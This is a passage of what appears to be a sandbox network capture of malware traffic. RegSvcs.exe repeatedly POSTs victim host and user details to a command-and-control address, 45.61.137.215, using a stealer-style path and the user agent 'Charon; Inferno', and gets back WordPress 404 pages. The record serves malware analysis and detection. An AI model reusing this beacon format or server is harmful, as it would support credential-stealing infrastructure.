May 29, 2024 15:44:20.001565933 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.9	49765	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:44:20.226591110 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:44:20.234719992 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:44:22.770471096 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:44:20 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:44:22.770488977 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 29, 2024 15:44:22.770509958 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 29, 2024 15:44:22.770519972 CEST	1236	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
May 29, 2024 15:44:22.770531893 CEST	896	IN	Data Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
May 29, 2024 15:44:22.771187067 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 29, 2024 15:44:22.771245956 CEST	224	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--w
May 29, 2024 15:44:22.771256924 CEST	1236	IN	Data Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 Data Ascii: p--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5
May 29, 2024 15:44:22.771342039 CEST	224	IN	Data Raw: 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 Data Ascii: --black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset-
May 29, 2024 15:44:22.771472931 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.9	49766	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:44:22.948803902 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:44:22.954634905 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:44:25.480535984 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:44:23 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:44:25.480561972 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 29, 2024 15:44:25.480572939 CEST	448	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 29, 2024 15:44:25.480585098 CEST	1236	IN	Data Raw: 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 Data Ascii: "DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.support
May 29, 2024 15:44:25.480597973 CEST	1236	IN	Data Raw: 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d Data Ascii: pemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: no
May 29, 2024 15:44:25.480609894 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d 77 Data Ascii: -color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color
May 29, 2024 15:44:25.480622053 CEST	1236	IN	Data Raw: 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 2c 32 30 36 2c 32 33 36 29 20 30 25 2c 72 67 62 28 31 35 32 2c 31 35 30 2c 32 34 30 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 Data Ascii: near-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(13
May 29, 2024 15:44:25.480633974 CEST	896	IN	Data Raw: 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 Data Ascii: ed: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flex{display: flex;}body .
May 29, 2024 15:44:25.480648041 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
May 29, 2024 15:44:25.480658054 CEST	224	IN	Data Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.9	49767	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:44:25.723485947 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:44:25.728465080 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:44:28.196142912 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:44:26 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:44:28.196166992 CEST	224	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
May 29, 2024 15:44:28.196175098 CEST	1236	IN	Data Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
May 29, 2024 15:44:28.196183920 CEST	1236	IN	Data Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",
May 29, 2024 15:44:28.196212053 CEST	448	IN	Data Raw: 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d Data Ascii: eptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&
May 29, 2024 15:44:28.196223021 CEST	1236	IN	Data Raw: 72 74 61 6e 74 3b 0a 09 09 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 68 65 69 67 68 74 3a 20 31 65 6d 20 21 69 6d Data Ascii: rtant;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !important;margin: 0 0.07em !important;vertical-align: -0.1em !important;background: none !important;padding: 0 !important;}
May 29, 2024 15:44:28.196233034 CEST	224	IN	Data Raw: 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 63 79 61 6e 2d 62 6c 75 65 3a 20 23 38 65 64 31 66 63 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 3a Data Ascii: --wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147
May 29, 2024 15:44:28.196428061 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
